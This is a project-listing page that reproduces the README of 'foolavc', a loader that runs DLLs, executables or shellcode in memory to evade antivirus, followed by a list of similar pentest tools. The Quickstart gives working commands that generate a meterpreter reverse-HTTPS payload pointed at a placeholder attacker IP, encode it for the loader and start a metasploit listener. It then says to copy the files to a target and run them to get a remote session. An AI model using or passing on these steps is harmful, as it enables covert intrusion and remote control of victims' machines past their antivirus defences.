All Projects â†’ hvqzao â†’ Foolavc

hvqzao / Foolavc

Licence: mit
foolav successor - loads DLL, executable or shellcode into memory and runs it effectively bypassing AV

Programming Languages

c
32536 projects - #5 most used programming language

Projects that are alternatives of or similar to Foolavc

Eyes
👀 🖥️ Golang rewrite of eyes.sh. Let's you perform domain/IP address information gathering. Wasn't it esr who said "With enough eyeballs, all your IP info are belong to us?" 🔍 🕵️
Stars: ✭ 38 (-59.14%)
Mutual labels:  pentest-tool
Fuxi
Penetration Testing Platform
Stars: ✭ 1,103 (+1086.02%)
Mutual labels:  pentest-tool
One Lin3r
Gives you one-liners that aids in penetration testing operations, privilege escalation and more
Stars: ✭ 1,259 (+1253.76%)
Mutual labels:  pentest-tool
Privesccheck
Privilege Escalation Enumeration Script for Windows
Stars: ✭ 1,032 (+1009.68%)
Mutual labels:  pentest-tool
Vulmap
Vulmap 是一款 web 漏洞扫描和验证工具, 可对 webapps 进行漏洞扫描, 并且具备漏洞利用功能
Stars: ✭ 1,079 (+1060.22%)
Mutual labels:  pentest-tool
Xshock
XSHOCK Shellshock Exploit
Stars: ✭ 65 (-30.11%)
Mutual labels:  pentest-tool
House
A runtime mobile application analysis toolkit with a Web GUI, powered by Frida, written in Python.
Stars: ✭ 910 (+878.49%)
Mutual labels:  pentest-tool
Eggshell
iOS/macOS/Linux Remote Administration Tool
Stars: ✭ 1,286 (+1282.8%)
Mutual labels:  pentest-tool
Nim Smbexec
SMBExec implementation in Nim - SMBv2 using NTLM Authentication with Pass-The-Hash technique
Stars: ✭ 59 (-36.56%)
Mutual labels:  pentest-tool
Venom
Venom - A Multi-hop Proxy for Penetration Testers
Stars: ✭ 1,228 (+1220.43%)
Mutual labels:  pentest-tool
Sudo killer
A tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo for linux privilege escalation.
Stars: ✭ 1,073 (+1053.76%)
Mutual labels:  pentest-tool
Burpsuite Collections
BurpSuite收集:包括不限于 Burp 文章、破解版、插件(非BApp Store)、汉化等相关教程,欢迎添砖加瓦---burpsuite-pro burpsuite-extender burpsuite cracked-version hackbar hacktools fuzzing fuzz-testing burp-plugin burp-extensions bapp-store brute-force-attacks brute-force-passwords waf sqlmap jar
Stars: ✭ 1,081 (+1062.37%)
Mutual labels:  pentest-tool
Cloudflair
🔎 Find origin servers of websites behind CloudFlare by using Internet-wide scan data from Censys.
Stars: ✭ 1,176 (+1164.52%)
Mutual labels:  pentest-tool
Powerladon
Ladon Network Penetration Scanner for PowerShell, vulnerability / exploit / detection / MS17010/SmbGhost,Brute-Force SMB/IPC/WMI/NBT/SSH/FTP/MSSQL/MYSQL/ORACLE/VNC
Stars: ✭ 39 (-58.06%)
Mutual labels:  pentest-tool
In Spectre Meltdown
This tool allows to check speculative execution side-channel attacks that affect many modern processors and operating systems designs. CVE-2017-5754 (Meltdown) and CVE-2017-5715 (Spectre) allows unprivileged processes to steal secrets from privileged processes. These attacks present 3 different ways of attacking data protection measures on CPUs enabling attackers to read data they shouldn't be able to. This tool is originally based on Microsoft: https://support.microsoft.com/en-us/help/4073119/protect-against-speculative-execution-side-channel-vulnerabilities-in
Stars: ✭ 86 (-7.53%)
Mutual labels:  pentest-tool
Passhunt
Passhunt is a simple tool for searching of default credentials for network devices, web applications and more. Search through 523 vendors and their 2084 default passwords.
Stars: ✭ 961 (+933.33%)
Mutual labels:  pentest-tool
Cloakify
CloakifyFactory - Data Exfiltration & Infiltration In Plain Sight; Convert any filetype into list of everyday strings, using Text-Based Steganography; Evade DLP/MLS Devices, Defeat Data Whitelisting Controls, Social Engineering of Analysts, Evade AV Detection
Stars: ✭ 1,136 (+1121.51%)
Mutual labels:  pentest-tool
Winpwn
Automation for internal Windows Penetrationtest / AD-Security
Stars: ✭ 1,303 (+1301.08%)
Mutual labels:  pentest-tool
Eyes.sh
Let's you perform domain/IP information gathering... in BASH! Wasn't it esr who said "With enough eyeballs, all your IP info are belong to us?"
Stars: ✭ 89 (-4.3%)
Mutual labels:  pentest-tool
Ldap search
Python3 script to perform LDAP queries and enumerate users, groups, and computers from Windows Domains. Ldap_Search can also perform brute force/password spraying to identify valid accounts via LDAP.
Stars: ✭ 78 (-16.13%)
Mutual labels:  pentest-tool

foolavc

This project is foolav continuation.

Original foolav was offered only as x86 executable, used single encoding for externally kept payload file. Once foolav is executed, payload is loaded into memory and executed as a shellcode in separate thread.

foolavc on the other hand supports both x86 and x86_64 architectures, allows use of both internal (built-in) or external payloads. Those can be interpreted in one of three ways: shellcode, DLL and EXEcutable.

Quickstart

cd foolavc
# create meterpreter executable
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=__ATTACKER_IP__ LPORT=8443 -f exe -o met64.exe
# encode it to met64.me
python m-encode.py met64.exe
# foolavc.exe acts as a loader, must have same name as .me file created earlier
cp x64/Release/foolavc.exe met64.exe

# create .rc script for metasploit
echo >msf.rc <<EOF
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_https
set LPORT 8443
set LHOST 0.0.0.0
set ReverseListenerBindAddress 0.0.0.0
set AutoRunScript migrate -f
show options
run -j
EOF
# start metasploit console with above script
msfconsole -qL -r msf.rc

# now copy both met64.exe and met64.me to the target system and execute met64.exe (foolavc binary)
# meterpreter session should spawn

Functionality

Once started binary checks for content of xl variable (payload.h). If set, it will be loaded into memory as DLL. Same thing happens for xe variable (loaded and executed in memory as PE executable file). xf variable, if set, will be executed as shellcode. In order to generate payload, x-encode.py script is provided.

External payloads should be stored in files in the same directory as executable. Those should be encoded using m-encode.py scipt. .ml is threated as DLL, .me as EXE and .mf as shellcode. Executable checks its name and attempts to open file with same name and one of before mentioned extensions.

Hints

  • Remember to use consistent architecture between binary and used payloads.

  • Once first present payload is executed, program waits for an input and is terminated. pause is used to wait for an input. If needed, this can be commented out or just bypassed - i.e. echo | pause

License

MIT License

This project uses MemoryModule library (MPL 2.0 Licensed)

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected]